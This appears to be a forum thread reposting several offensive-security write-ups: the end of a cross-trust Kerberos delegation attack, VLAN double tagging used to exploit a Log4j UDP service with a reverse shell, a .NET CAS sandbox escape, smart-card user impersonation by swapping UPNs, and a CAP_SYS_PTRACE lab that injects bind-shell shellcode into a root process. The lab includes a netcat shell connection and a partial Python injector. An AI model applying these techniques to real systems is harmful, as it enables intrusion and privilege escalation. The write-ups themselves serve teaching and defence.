It is this ticket that is then used to request the S4U2Self service ticket for TestChildSPN$ for the user internal.admin from IDC1.internal.zeroday.lab (the foreign domain controller):

To complete the S4U2Self process, the S4U2Self service ticket is requested from IC1DC1.child1.internal.zeroday.lab, again for TestChildSPN$ for the user internal.admin, but this time the user's real TGT is used and the S4U2Self service ticket retrieved from the foreign domain in the previous step is attached as an additional ticket within the TGS-REQ:

To begin the impersonation, an S4U2Proxy service ticket is requested for the target service (http/ISQL1.internal.zeroday.lab in this case) from IC1DC1.child1.internal.zeroday.lab. As this request is to the local domain controller, the user's real TGT is used and the local S4U2Self ticket, received in the previous step, is attached as an additional ticket in the TGS-REQ:

Lastly, an S4U2Proxy service ticket is also requested for http/ISQL1.internal.zeroday.lab from IDC1.internal.zeroday.lab. As this request is to the foreign domain controller, the cross-domain TGT is used, and the local S4U2Proxy service ticket received in the previous step is attached as an additional ticket in the TGS-REQ.

Once the final ticket is received, Rubeus automatically imports it so it can be used immediately:

Now that the final service ticket has been imported, it's possible to get code execution on the target server:

Conclusion

While it was possible to perform this across trusts within a single forest, I didn't manage to get it to work across external trusts. It would probably be possible but would require a non-standard trust configuration. With most configurations this wouldn't be required, as you could either create a machine account within the target domain or delegate to the same machine account, as I've discussed in a previous post, but it's important to understand the limits of what is possible with these types of attacks.
The mitigations are exactly the same as Elad discusses in his blog post, as the attack is exactly the same; the only difference is that here I'm performing it across a domain trust.

Acknowledgements

A big thanks to Will Schroeder for all of his work on delegation attacks and Rubeus. Also Elad Shamir for his detailed work on resource-based constrained delegation attacks and contributions to Rubeus, which helped me greatly when trying to implement this. Benjamin Delpy for all of his work on Kerberos tickets in mimikatz and kekeo. I'm sure there are many more too; without these people's work, research in this area would be much further behind where it currently is!

Sursa: https://exploit.ph/crossing-trusts-4-delegation.html
-
Exploiting VLAN Double Tagging

April 17, 2020

We have all heard about VLAN double tagging attacks for a long time now. There have been many references and even a single-packet proof of concept for the VLAN double tagging attack, but none of them showcase a weaponized attack. In this blog Amish Patadiya will use the VLAN double tagging technique to reach a VLAN and exploit a vulnerability on a server which resides on another VLAN, using native Linux tools creatively, and demonstrate an actual exploitation using VLAN double tagging. But first the basics.

What is VLAN?

Before diving into the concept of VLAN (Virtual Local Area Network) tagging, it is important to understand the need for VLANs. When we create a network, there will be numerous hosts communicating with each other within that network. VLANs allow flexibility of network placement by allowing multiple network configurations on each switch, allowing endpoint devices to be segregated from each other even though they might be connected to the same physical switch. For larger networks, VLAN segregation also helps in breaking broadcast domains into smaller groups. A broadcast domain can be considered as a network where all nodes communicate over the data link layer.

In a VLAN network, all packets are assigned a VLAN id. By default all switch ports are considered members of the native VLAN unless a different VLAN is assigned. VLAN 1 is the native VLAN by default, and the network packets of the native VLAN will not have a tag on them. Hence, such traffic will be transmitted untagged in the VLAN network. For example, if we try to communicate with a host on a VLAN network, the network packet will have a VLAN tag (ID: 20 is the tag in this case) as shown in Figure:

What is VLAN Double Tagging?

Before understanding the exploitation, let's have a quick overview of VLAN double tagging.
The figure below shows a network diagram which is kind-of self-explanatory:

Note that the attacker is in VLAN-1, the native VLAN, which is required for the double tagging attack, and the victim server is in VLAN-20. The server has a local IP address "10.0.20.11" which is not accessible from the attacker's machine "kali-internal" on VLAN-1, as shown in the Figure below:

The attacker's machine has two interfaces and "eth2" is connected to the VLAN-1 network. The Figure below shows the network configuration of interface "eth2":

When it comes to VLAN exploitation, Yersinia is the tool of choice. Yersinia provides a Proof of Concept (PoC) using an ICMP packet. We have replicated a PoC using Yersinia for sending ICMP packets, as shown in the Figure below:

Let's confirm VLAN double tagging on each link in the network. The Figure provided below shows traffic captured on link "1", which connects the VLAN-1 network and router "R1". The figure shows the ICMP packet for address "10.0.20.11" with dual 802.1Q VLAN tags:

The Figure below shows the traffic captured on link "Trunk", which connects router "R1" and router "R2". When VLAN traffic passes through the trunk, all native VLAN packets are transmitted without tags, i.e. untagged; hence this attack can only be performed from the native VLAN network. Here, the VLAN-1 tag got removed and the packet only had the VLAN-20 tag.

Now the traffic is on the VLAN-20 network, and therefore the VLAN-20 tag was removed by router "R2", as shown in the Figure below, which also shows traffic captured on link "2" connecting router "R2" and the victim server:

Let's try to replicate the same attack using native Linux tools.

Double Tagging Using Native Tools

We will leverage the vconfig utility available on all Linux machines. Using this utility we could create an interface which allowed us to send double tagged packets to the network.
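On the wire, what vconfig produces is simply an Ethernet frame carrying two stacked 802.1Q tags. A minimal sketch of that layout (illustrative only; the MAC addresses are made up, and actually transmitting such a frame would need a raw AF_PACKET socket and root):

```python
import struct

def vlan_tag(vid, pcp=0, dei=0):
    # One 802.1Q tag: 16-bit TPID 0x8100 followed by a 16-bit TCI
    # laid out as PCP (3 bits) | DEI (1 bit) | VID (12 bits).
    return struct.pack("!HH", 0x8100, (pcp << 13) | (dei << 12) | vid)

dst = bytes.fromhex("ffffffffffff")   # broadcast destination (example)
src = bytes.fromhex("0242ac110002")   # made-up source MAC

# Outer tag = native VLAN 1 (stripped at the trunk), inner tag = victim VLAN 20,
# then the real EtherType (0x0800 = IPv4); the IP/ICMP payload would follow.
frame = dst + src + vlan_tag(1) + vlan_tag(20) + struct.pack("!H", 0x0800)

print(frame.hex())
```

When the trunk strips the outer tag, the bytes starting at offset 16 (the inner `8100` tag for VLAN 20) become the frame's only tag, which is exactly the behaviour captured on the "Trunk" link above.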
We have written a script detailing each step, as shown in the figure below, to help configure your network to double tag real-time traffic from your machine:

Here we have used the 802.1Q kernel module to allow tagged packet transmission. The virtual interface "eth2.1" is created using vconfig, which automatically tags packets with VLAN id 1. Another interface, "eth2.1.20", which tags packets with VLAN id 20, is created on "eth2.1", resulting in double tagging of the outgoing packet. On executing this script you get the following output:

To test our configuration for double tagging on real-time traffic, let's ping the victim server "10.0.20.11" as shown in the Figure below:

We can see in the traffic captured on link "1" that the ICMP packets sent to the victim server are getting double tagged:

The traffic captured on link "2" confirms that the packets also reached the victim server:

This confirms our ability to transmit actual traffic to another VLAN. Now let's try to weaponize the attack.

Weaponizing double tagging

To weaponize this we started with TCP traffic and immediately hit a roadblock, which made us revisit our fundamentals. Taking a stepwise approach to understand the problem, we started a server on the victim machine as shown in Figure:

On the attacker machine we ran a simple "wget" to access content from the web server hosted on the victim server, as shown below:

It can be seen that wget could not find the web server. This is not because of a double tagging misconfiguration. It is because HTTP uses the TCP protocol, and TCP requires a 3-way handshake to initiate a connection. When making a request, wget will first attempt to establish a full TCP 3-way handshake before the actual communication. The Figure below shows the traffic captured on link "2", which shows the "SYN" packet sent from the attacker machine to the victim server:

As the victim is a member of VLAN-20, the response packet from the victim will have a VLAN-20 tag.
Since the attacker is a part of VLAN-1, a different VLAN, the attacker will not receive any response from the victim. The VLAN double tagging attack is a one-way communication: the attacker machine will not receive any "SYN-ACK" packet to complete the 3-way handshake, as shown in Figure:

To demonstrate, we tried to communicate with the victim on TCP port 8080, and the network status on the attacker's machine is "SYN_SENT" as shown in Figure:

On the victim's machine, the network status for this request packet is "SYN_RCV" as shown in Figure:

Meaning the "SYN-ACK" sent by the victim never reached the attacker on the other VLAN. This supports the conclusion, for now, that we cannot attack a TCP service on another VLAN.

What about UDP services? There are multiple services running on UDP ports, and UDP ports most of the time go unnoticed in engagements. As UDP is a connectionless protocol, it does not require any handshake. It sends the data directly, so we can send packets to any UDP service on another VLAN.

To demonstrate the attack we used a "Log4j" server having vulnerability CVE-2017-5645, in UDP mode. The Figure below shows that the "Log4j" service is listening on UDP port "12345" on the victim server:

To verify the success of our attack, we will try to create a file with the name "success" at location "/tmp/" on the victim server. The Figure below lists the current contents of "/tmp/" on the server:

The "Log4j" service accepts logs in serialized format, so we make use of the ysoserial tool to generate a serialized payload and run the payload to execute the attack on the victim server on the mentioned port, as shown below.

On analysing the traffic in Wireshark we confirmed that the UDP payload reached the VLAN-20 network:

The payload reached the victim server and created a file named "success" at location "/tmp/" as shown in the Figure below:

Now, let's get a shell. However, we are again stuck with the one-way communication limitation.
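The property that makes the UDP path work where TCP fails is that a single datagram is a complete delivery: nothing has to come back before the payload reaches the service. A loopback sketch of that property (the port and payload are arbitrary stand-ins for the victim's Log4j listener; this demonstrates delivery only, which is all one-way exploitation needs):

```python
import socket

# Loopback stand-in for the victim's UDP service.
srv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
srv.bind(("127.0.0.1", 0))        # port 0 = let the OS pick one
srv.settimeout(5)
port = srv.getsockname()[1]

# "Attacker" side: a lone datagram, no SYN/SYN-ACK/ACK exchange.
atk = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
atk.sendto(b"serialized-payload", ("127.0.0.1", port))

data, addr = srv.recvfrom(1024)
print(data)                       # payload arrives even though nothing was ever acknowledged
atk.close()
srv.close()
```

Contrast this with TCP, where the kernel refuses to hand any application data to the peer until the handshake has completed in both directions.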
We can overcome this limitation by leveraging a publicly hosted server (let's say kali-Internet). We started a listener on the server "kali-Internet" on port "32323" over the internet, as shown in Figure:

We create a serialized payload using ysoserial which sends the shell to "kali-Internet". After the payload is executed on the victim server, we get the shell over the internet. Doing a quick cat on "/etc/hostname" of the server, it reads "Victim__[eth0:_10.0.20.11/24]", which is our victim server, as shown in the Figure below:

And this is how we can use the VLAN double tagging technique for actual exploitation of UDP services.

TCP attack revisited

Once we were able to exploit a UDP service, we wanted to revisit TCP and see if anything could be done, so we ran some tests. The section below is purely an adventure into wonderland, and we are making assumptions to see if anything could be done.

The first major hurdle in our path was that the 3-way handshake couldn't be completed. Let's delve deep into the handshake and understand the bottleneck. We set up the following:

Start a listener on the victim machine
Start traffic capture on the victim machine
Send a wget request from the attacker machine

We can see in the traffic capture that the SYN packet is received and a SYN-ACK packet is sent from the victim machine with "Seq=2678105924" and "Ack=2082233419"; however, as described already, this doesn't reach the attacker. We can validate this by looking at the netstat output on the attacker machine: the connection is in SYN_SENT status.

This got us thinking: what if we emulate the SYN-ACK, would the attacker machine then send a full request to the victim? So we tested this using a utility called hping3:

This indeed resulted in a connection being established, as can be seen below:

Now, as the connection is established from the attacker's perspective, the attacker goes ahead and sends an HTTP request. This is duly received and captured at the victim end.
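The spoofed SYN-ACK only worked because we could read the victim's Seq value off a capture; doing it blind means guessing an initial sequence number, and modern stacks derive that per RFC 6528, roughly ISN = M + F(localip, localport, remoteip, remoteport, secretkey). A rough sketch of that formula (MD5 as the RFC's suggested F, a 4-microsecond timer as M; the secret is a made-up stand-in for the kernel's per-boot value):

```python
import hashlib
import struct
import time

SECRET = b"per-boot-secret"   # hypothetical; real kernels generate this at boot

def isn(laddr, lport, raddr, rport):
    # RFC 6528: ISN = M + F(localip, localport, remoteip, remoteport, secretkey),
    # where M is a clock ticking roughly every 4 microseconds and F is a
    # keyed hash (MD5 is the RFC's suggested choice).
    m = int(time.time() * 1_000_000) // 4
    f = hashlib.md5(
        f"{laddr}:{lport}:{raddr}:{rport}".encode() + SECRET
    ).digest()
    return (m + struct.unpack("<I", f[:4])[0]) & 0xFFFFFFFF

seq = isn("10.0.1.5", 51234, "10.0.20.11", 8080)
```

Because F mixes in a secret the attacker never sees, the per-connection offset cannot be computed offline, which is exactly the obstacle discussed next.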
This shows that if we can grab valid "Seq" and "Ack" values, a successful TCP connection could be established and an attack on a TCP service could be possible. However, this attack would have been super easy if RFC 6528 was not in existence (https://www.rfc-archive.org/getrfc.php?rfc=6528). This RFC randomizes TCP sequence (and therefore Ack) numbers at the protocol level itself. However, we wanted to put this out in the open so that if anyone wants to go down this path, they have some details of what people have attempted so far.

Limitations

The following prerequisites are needed to perform the VLAN double tagging attack:

The attacker must be on the native VLAN network.
The attacker should have the following information about the victim server:
VLAN information of the server.
A vulnerable UDP service and its port.

Remediation

Never use the native VLAN for any network. By default VLAN 1 is the native VLAN; if deemed necessary, change the native VLAN to something other than VLAN id 1.
While configuring a VLAN network, explicitly configure endpoint interfaces as access ports.
Always specify the allowed VLAN ids per trunk; never allow all VLAN traffic to pass through any trunk port.

References

https://cybersecurity.att.com/blogs/security-essentials/vlan-hopping-and-mitigation
https://packetlife.net/blog/2010/feb/22/experimenting-vlan-hopping/
https://tools.kali.org/vulnerability-analysis/yersinia
https://serverfault.com/questions/506488/linux-how-can-i-configure-dot1addouble-tag-on-a-interface
https://www.rfc-archive.org/getrfc.php?rfc=6528

Sursa: https://www.notsosecure.com/exploiting-vlan-double-tagging/
-
Thursday, 7 May 2020

Old .NET Vulnerability #5: Security Transparent Compiled Expressions (CVE-2013-0073)

It's been a long time since I wrote a blog post about my old .NET vulnerabilities. I was playing around with some .NET code and found an issue when serializing delegates inside a CAS sandbox; I got a SerializationException thrown with the following text:

Cannot serialize delegates over unmanaged function pointers, dynamic methods or methods outside the delegate creator's assembly.

I couldn't remember if this has always been there or if it was new. I reached out on Twitter to my trusted friend on these matters, @blowdart, who quickly fobbed me off to Levi. But the takeaway is that at some point the behavior of delegate serialization was changed as part of a more general change to add Secure Delegates. It was then I realized that it's almost certainly (mostly) my fault that the .NET Framework has this feature, and I dug out one of the bugs which caused it to be the way it is. Let's have a quick overview of what the Secure Delegate is trying to prevent and then look at the original bug.

.NET Code Access Security (CAS), as I've mentioned before when discussing my .NET PAC vulnerability, allows a .NET "sandbox" to restrict untrusted code to a specific set of permissions. When a permission demand is requested, the CLR will walk the calling stack and check the Assembly Grant Set for every stack frame. If there is any code on the stack which doesn't have the required permission grants, then the stack walk stops and a SecurityException is generated which blocks the function from continuing. I've shown this in the following diagram: some untrusted code tries to open a file but is blocked by a Demand for FileIOPermission, as the stack walk sees the untrusted code and stops.

What has this to do with delegates? A problem occurs if an attacker can find some code which will invoke a delegate under asserted permissions.
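The stack walk and the effect of an Assert can be modelled in a few lines. This is a toy illustration of the mechanism just described, not the CLR's actual implementation; frame names and the dict layout are invented here:

```python
# Toy model of a CAS permission demand: walk the call stack from the
# demanding frame toward its callers, failing at the first frame whose
# assembly lacks the permission -- unless a frame asserts it first,
# which stops the walk early.
def demand(stack, permission):
    # `stack` is ordered bottom (entry point) to top (current frame).
    for frame in reversed(stack):
        if permission in frame.get("asserts", set()):
            return True   # an Assert terminates the walk: access granted
        if permission not in frame["grants"]:
            raise PermissionError(f"{frame['name']} lacks {permission}")
    return True

trusted   = {"name": "File.OpenRead",  "grants": {"FileIO"}}
asserter  = {"name": "TrustedHelper",  "grants": {"FileIO"}, "asserts": {"FileIO"}}
untrusted = {"name": "EvilCode",       "grants": set()}

# Without an Assert below the demand, the untrusted frame fails the walk:
try:
    demand([untrusted, trusted], "FileIO")
    blocked = False
except PermissionError:
    blocked = True

# With a trusted frame asserting the permission, the walk never reaches
# the untrusted caller -- this is the window the delegate trick exploits:
granted = demand([untrusted, asserter, trusted], "FileIO")
```

The attack described next is simply about getting attacker-chosen code to run in the position of `asserter`'s callee, where the walk stops before reaching the untrusted frame.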
For example, in the previous diagram there was an Assert at the bottom of the stack, but the stack walk fails early when it hits the Untrusted Caller Frame. However, as long as we have a delegate call, and the function the delegate calls is trusted, then we can put it into the chain and successfully get the privileged operation to happen.

The problem with this technique is finding a trusted function we can wrap in a delegate which you can attach to something such as a Windows Forms event handler, which might have the prototype:

void Callback(object obj, EventArgs e)

and would call the File.OpenRead function, which has the prototype:

FileStream OpenRead(string path)

That's a pretty tricky thing to find. If you know C# you'll know about lambda functions; could we use something like this?

EventHandler f = (o,e) => File.OpenRead(@"C:\SomePath")

Unfortunately not. The C# compiler takes the lambda and generates an automatic class with that function prototype in your own assembly. Therefore the call to adapt the arguments will go through an untrusted function and it'll fail the stack walk. It looks something like the following in CIL:

ldsfld class Program/'<>c' Program/'<>c'::'<>9'
ldftn instance void Program/'<>c'::'<Main>b__0_0'(object, class [mscorlib]System.EventArgs)
newobj instance void [mscorlib]System.EventHandler::.ctor(object, native int)

Turns out there's another way. See if you can spot the difference here.

Expression<EventHandler> lambda = (o,e) => File.OpenRead(@"C:\SomePath")
EventHandler f = lambda.Compile()

We're still using a lambda, surely nothing has changed? Well, let's look at the CIL.
stloc.0
ldtoken [mscorlib]System.Object
call class [mscorlib]System.Type [mscorlib]System.Type::GetTypeFromHandle(valuetype [mscorlib]System.RuntimeTypeHandle)
ldstr "o"
call class [System.Core]System.Linq.Expressions.ParameterExpression [System.Core]System.Linq.Expressions.Expression::Parameter(class [mscorlib]System.Type, string)
stloc.2
ldtoken [mscorlib]System.EventArgs
call class [mscorlib]System.Type [mscorlib]System.Type::GetTypeFromHandle(valuetype [mscorlib]System.RuntimeTypeHandle)
ldstr "e"
call class [System.Core]System.Linq.Expressions.ParameterExpression [System.Core]System.Linq.Expressions.Expression::Parameter(class [mscorlib]System.Type, string)
stloc.3
ldnull
ldtoken method class [mscorlib]System.IO.FileStream [mscorlib]System.IO.File::OpenRead(string)
call class [mscorlib]System.Reflection.MethodBase [mscorlib]System.Reflection.MethodBase::GetMethodFromHandle(valuetype [mscorlib]System.RuntimeMethodHandle)
castclass [mscorlib]System.Reflection.MethodInfo
ldc.i4.1
newarr [System.Core]System.Linq.Expressions.Expression
dup
ldc.i4.0
ldstr "C:\\SomePath"
ldtoken [mscorlib]System.String
call class [mscorlib]System.Type [mscorlib]System.Type::GetTypeFromHandle(valuetype [mscorlib]System.RuntimeTypeHandle)
call class [System.Core]System.Linq.Expressions.ConstantExpression [System.Core]System.Linq.Expressions.Expression::Constant(object, class [mscorlib]System.Type)
stelem.ref
call class [System.Core]System.Linq.Expressions.MethodCallExpression [System.Core]System.Linq.Expressions.Expression::Call(class [System.Core]System.Linq.Expressions.Expression, class [mscorlib]System.Reflection.MethodInfo, class [System.Core]System.Linq.Expressions.Expression[])
ldc.i4.2
newarr [System.Core]System.Linq.Expressions.ParameterExpression
dup
ldc.i4.0
ldloc.2
stelem.ref
dup
ldc.i4.1
ldloc.3
stelem.ref
call class [System.Core]System.Linq.Expressions.Expression`1<!!0> [System.Core]System.Linq.Expressions.Expression::Lambda<class [mscorlib]System.EventHandler>(class [System.Core]System.Linq.Expressions.Expression, class [System.Core]System.Linq.Expressions.ParameterExpression[])
stloc.1
ldloc.1
callvirt instance !0 class [System.Core]System.Linq.Expressions.Expression`1<class [mscorlib]System.EventHandler>::Compile()

That's just crazy. What's happened? The key is the use of Expression. When the C# compiler sees that type, rather than creating a delegate in your assembly it'll create something called an expression tree. That tree is then compiled into the final delegate. The important thing for the vulnerability I reported is that this delegate was trusted, as it was built using the AssemblyBuilder functionality, which takes the Permission Grant Set from the calling assembly. As the calling assembly is the Framework code, it got full trust. It wasn't trusted to Assert permissions (a Security Transparent function), but it also wouldn't block the stack walk either.

This allows us to implement any arbitrary delegate adapter to convert one delegate call-site into calling any other API, as long as you can do that under an asserted permission set. I was able to find a number of places in WinForms which invoked event handlers while asserting permissions that I could exploit. The initial fix was to fix those call-sites, but the real fix came later: the aforementioned Secure Delegates.

Silverlight always had Secure Delegates: it would capture the current CAS permission set on the stack when creating them and, if needed, add a trampoline to the delegate to insert an untrusted stack frame into the call. It seems this was later added to .NET. The reason that serializing is blocked is that when the delegate gets serialized this trampoline gets lost, and so there's a risk of it being used to exploit something to escape the sandbox. Of course CAS is dead anyway.
The end result looks like the following:

Anyway, these are the kinds of design decisions that were never fully scoped from a security perspective. They're not unique to .NET, or Java, or anything else which runs arbitrary code in a "sandboxed" context, including JavaScript engines such as V8 or JSCore.

Posted by tiraniddo at 16:12

Sursa: https://www.tiraniddo.dev/2020/05/old-net-vulnerability-5-security.html
-
Attacking smart cards in active directory

Reading time ~9 min

Posted by Hector Cuesta on 26 March 2020

Categories: Abuse, Active directory, Research, Smartcards, Windows, Windows events, Forgery, Impersonation, Smartcard

Introduction

Recently, I encountered a fully password-less environment. Every employee in this company had their own smart card that they used to log in to their computers, emails, internal applications and more. None of the employees at the company had a password at all; this sounded really cool. In this post I will detail a technique used to impersonate other users by modifying a User Principal Name (UPN) on an Active Directory domain that only uses smart cards. I want to focus on the smart card aspect, so for context, we start this post assuming we have some NetNTLMv2 hashes that we can neither relay nor crack.

Smart Cards and active directory

Before abusing any technology it's important to understand the basics, so let's take a look at how Active Directory deals with smart cards. If you have some knowledge of Windows internals you probably know that NTLM/NetNTLM hashes are important for Windows computers to communicate with each other, and these hashes are generated from a secret, usually the password of the user. So how does Active Directory deal with smart cards if the users do not have any password at all?

When you set up a user account in Active Directory to use smart cards, the account password is automatically changed to a random 120 character string. So the chances of cracking these are close to zero with current hardware. To make this even more challenging, Windows Server 2016 has an option to regenerate these random passwords after every interactive login, invalidating previous NTLM hashes if your forest is at the Server 2016 level. Alternatively, you can set this password to expire once a day. If you want more information about this setup I encourage you to check out this blogpost. But how does this really work?
What does the smart card contain and, more importantly, how are smart cards and Active Directory users correlated?

How does it really work?

The setup that I'm going to show you can have small variations, but this is the most common implementation I have encountered. All smart cards contain a certificate with multiple values, one of them being the Subject Alternative Name (SAN). This field contained the email of the user that owned the card, so, for example, "hector.cuesta@contoso.local". To access the certificate on the smart card, the user needed to enter a PIN validated against the one stored on the smart card. Every time the user wanted to log in to their computer, they needed to first insert the smart card and then enter the PIN.

SAN attribute of the smart card certificate

After the PIN is entered, the smart card gives the certificate to the computer and this information is forwarded to a domain controller for further validation/authentication. When the domain controller receives the certificate, the signing authority is validated, and if the authority is trusted, authentication will proceed. At this point the domain controller knows that the information contained in the certificate can be validated, but how is this certificate correlated with an Active Directory user? To do this, the domain controller extracts the SAN from the certificate, "hector.cuesta@contoso.local", and searches for this value against all the User Principal Names (UPNs) of Active Directory users. To simplify things, when there is a match, the user's NTLM hash and some other information are sent back to the computer that initiated the authentication process and the login process can be finalised.

Smart card login process.

At this point we have two options for abusing this technology. The first: try to attack the smart card directly by forging a certificate with an arbitrary SAN. Unless you have a way to break RSA, you should not be able to do this.
The second: attack the Active Directory environment by modifying the UPN of a victim user to the value of the SAN in your legitimate smart card (i.e. swap the victim's UPN for yours). When the UPN <-> SAN correlation occurs, the domain controller sends back the details of the victim user instead of yours.

Who can modify the UPN of a user? The first group of people that comes to mind is domain admins, and you may be thinking "What is the point of impersonating someone if you are already domain admin?" But, as I will show later, this is still interesting even when you have domain admin privileges. Anyway, changing UPN values is not restricted to domain admins only. Delegation of permissions in Active Directory environments is common, and includes delegating the permission to change a user's UPN as well. This can be seen in the following Microsoft guidelines, which even have a template for making this change.

Template to delegate UPN change in Active Directory

But why would someone want to delegate this change? Imagine a big company with thousands of employees. Updates to user profiles, like a change of address/phone number, corrections of errors, or modifications to the name and surname of users, are common tasks. Imagine, for example, countries where people change their surname when they get married. Typically, high level IT admins like domain admins don't perform these incremental changes; instead this kind of low level administration is usually performed by help desk users. And as you will see later, a user with permission to change the UPN value of a user can impersonate any other user in Active Directory when using smart cards.

As I said before, this is also interesting even if you already have domain admin privileges. Imagine that you manage to compromise the NTLM hash of a domain admin. You are not going to be able to crack it, but you can do pass the hash.
You have two main problems. The first is that the NTLM hash is going to become invalid as soon as the domain admin performs an interactive login using their smart card, and the second is that when an account is configured to use smart cards you can't perform interactive logins using pass the hash, so forget about RDP. Alternatively, imagine that you want to log in to a computer to obtain some files, but this computer is properly isolated and no remote administrative interfaces are enabled; the only way would be to physically log in to the computer, and that's not possible to do using an NTLM hash. However, using the attack I am about to explain, you can trick Active Directory into allowing a login to the box using your smart card.

Performing the attack

Now that you understand the conceptual part of the attack, let's go into the practical details of how to execute it. You will need a valid user able to perform UPN changes, a valid smart card, a target account and the dsmod Windows utility. First of all you will need to change the UPN of the user associated with your smart card, since Active Directory does not allow duplicate UPNs to exist.

Change the UPN of your user to a random one.

Next you will need to modify the UPN of the target user, changing their UPN to match the SAN attribute of your smart card.

Change the UPN of the victim to match the SAN in your smart card (your UPN in this case).

After this, you simply log in to a computer using your smart card and automagically Windows will log you in as the victim user. Finally, restore the UPNs on the target user, or they are not going to be able to log in anymore with their smart card.

Restore the UPN of the victim.

How to detect/fix

At this point you are probably wondering how you can fix or detect this, and I am sad to tell you there is no fix, as this is the intended behaviour and how the current integration of smart cards and Active Directory works. However, there are a few things that can be done.
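To see why watching UPN writes matters, the DC-side SAN-to-UPN match and the swap above can be reduced to a toy simulation (the directory, account names and UPNs are invented here; dsmod performs the real change against Active Directory):

```python
# Toy model: the DC matches the certificate SAN against every account's
# UPN and authenticates whichever account matches.
directory = {
    "attacker": {"upn": "hector.cuesta@contoso.local"},
    "victim":   {"upn": "domain.admin@contoso.local"},
}

def logon(san):
    """DC side: find the account whose UPN equals the certificate SAN."""
    for account, attrs in directory.items():
        if attrs["upn"] == san:
            return account
    raise ValueError("no UPN matches the SAN")

smart_card_san = "hector.cuesta@contoso.local"   # fixed inside the card's certificate
before = logon(smart_card_san)                   # matches the attacker's own account

# The attack: free up our UPN first (no duplicates allowed), then
# assign it to the victim account.
directory["attacker"]["upn"] = "random@contoso.local"
directory["victim"]["upn"] = smart_card_san

after = logon(smart_card_san)                    # same card now matches the victim
```

Note that the card itself never changes; the two directory writes are the entire attack, which is why auditing those writes is the detection opportunity discussed next.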
First of all, monitor for Windows events that indicate a change in the UPN, such as event ID 4738, and actively verify the legitimacy of these changes as soon as they are performed. Another important action is to review who can perform UPN changes in your organisation and why. In my opinion, security is a battle of reducing attack surface, so the fewer users allowed to perform this change the better. In general, the values used for correlation between the smart card and Active Directory, the SAN and UPN in this case, should be treated as sensitive values, just like passwords, by monitoring for changes and controlling who can modify them.

Enumeration from a more offensive point of view can be done with Windows utilities like dsacls. Queries in tools like BloodHound could probably be made to obtain a list of users with permissions to change UPNs.

References

Searching for references to this "attack", I found an article from Roger A. Grimes where he mentioned this same attack avenue but using Windows GUI tools instead of dsmod. He also mentioned that he had heard about this attack in the past but couldn't remember who told him about it, so the original author remains unknown.

Sursa: https://sensepost.com/blog/2020/attacking-smart-cards-in-active-directory/
-
Privilege Escalation by abusing SYS_PTRACE Linux Capability

Nishant Sharma, May 8

Linux capabilities are used to allow binaries (executed by non-root users) to perform privileged operations without granting them full root permissions. There are 40 capabilities supported by the Linux kernel; the list can be found here. This model allows a binary or program to be granted specific permissions to perform privileged operations, rather than being given root privileges via setuid, setgid or passwordless sudo. As this topic is out of the scope of this post, we encourage the reader to read more at the following links:

Linux capabilities in practice
Linux Audit

Lab Scenario

We have set up the below scenario in our Attack-Defense labs for our students to practice. The screenshots have been taken from our online lab environment.

Lab: The Basics: CAP_SYS_PTRACE

This lab comprises a Linux machine with the necessary tools installed on it. The user or practitioner gets command-line interface (CLI) access to a bash shell inside a running container as the student user, through the web browser.

Challenge Statement

In this lab, you need to abuse CAP_SYS_PTRACE to get root on the box! A flag is kept in root's home directory.

Objective: Escalate to the root user and retrieve the flag!

Solution

Step 1: Find all binaries which have capabilities set for them.

Command: getcap -r / 2>/dev/null

Finding files with capabilities

The CAP_SYS_PTRACE capability is present in the permitted set of the /usr/bin/python2.7 binary. As a result, the current user can attach to other processes and trace their system calls.

Step 2: Check the services running on the machine.

Command: ps -eaf

Process Listing (Part I)
Process Listing (Part II)

Nginx is running on the machine. Nginx's master process is running as root and has PID 236.

Step 3: Check the architecture of the machine.

Command: uname -m

Checking system architecture

The machine is running 64-bit Linux.
Step 4: Search for publicly available TCP bind shell shellcodes.

Search on Google for "Linux x64 Bind shell shellcode exploit db".

Searching for shellcode

The second Exploit DB link contains a bind shell shellcode of 87 bytes.

Exploit DB Link: https://www.exploit-db.com/exploits/41128

The shellcode

The above shellcode will trigger a bind TCP shell on port 5600.

Step 5: Write a Python script to inject the bind TCP shellcode into the running process.

The C program provided at the GitHub link given below can be used as a reference for writing the Python script.

GitHub Link: https://github.com/0x00pf/0x00sec_code/blob/master/mem_inject/infect.c

Python script:

Save the above program as "inject.py".

Step 6: Run the Python script with the PID of the Nginx master process passed as an argument.

Command: python inject.py 236

Shellcode injection

If the shellcode was injected successfully, a TCP bind shell should be running on port 5600.

Step 7: Check the TCP listening ports on the machine.

Command: netstat -tnlp

A process is listening on port 5600.

Step 8: Connect to the bind shell with netcat.

Command: nc 127.0.0.1 5600

Check the current user.

Command: id

Connecting to port 5600

Step 9: Search for the flag file.

Command: find / -name flag 2>/dev/null

Searching for flag

Step 10: Retrieve the flag from the file flag.

Command: cat /root/flag

Retrieving the flag

Flag: 9260b41eaece663c4d9ad5e95e94c260

References:
Capabilities
ptrace
ptrace.h
user.h
ctypes
Linux/x64 — Bind (5600/TCP) Shell Shellcode
Mem Inject

Sursa: https://blog.pentesteracademy.com/privilege-escalation-by-abusing-sys-ptrace-linux-capability-f6e6ad2a59cc
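The inject.py referenced in Step 5 is not reproduced in text above. A simplified sketch of a ptrace-based injector along those lines might look like the following; it is hypothetical and untested against the lab, uses a one-byte placeholder instead of the real 87-byte bind shell payload, and assumes an x86_64 Linux target:

```python
import ctypes
import ctypes.util
import os
import struct
import sys

# ptrace request numbers on x86_64 Linux (from <sys/ptrace.h>)
PTRACE_POKETEXT = 4
PTRACE_GETREGS = 12
PTRACE_ATTACH = 16
PTRACE_DETACH = 17

# Placeholder payload: in the lab this would be the bind shell from
# Exploit DB 41128; a breakpoint byte stands in so the sketch is complete.
SHELLCODE = b"\xcc"

class UserRegs(ctypes.Structure):
    # Flattened view of x86_64 struct user_regs_struct (<sys/user.h>);
    # rip is the 17th 8-byte field (index 16).
    _fields_ = [("regs", ctypes.c_ulonglong * 27)]

RIP_INDEX = 16

def chunk_words(code):
    """NOP-pad the payload and split it into 8-byte words for POKETEXT."""
    code += b"\x90" * (-len(code) % 8)
    return [struct.unpack("<Q", code[i:i + 8])[0]
            for i in range(0, len(code), 8)]

def inject(pid):
    libc = ctypes.CDLL(ctypes.util.find_library("c"), use_errno=True)
    libc.ptrace.restype = ctypes.c_long
    libc.ptrace.argtypes = (ctypes.c_long, ctypes.c_long,
                            ctypes.c_void_p, ctypes.c_void_p)
    regs = UserRegs()
    libc.ptrace(PTRACE_ATTACH, pid, None, None)
    os.waitpid(pid, 0)                       # wait for the tracee to stop
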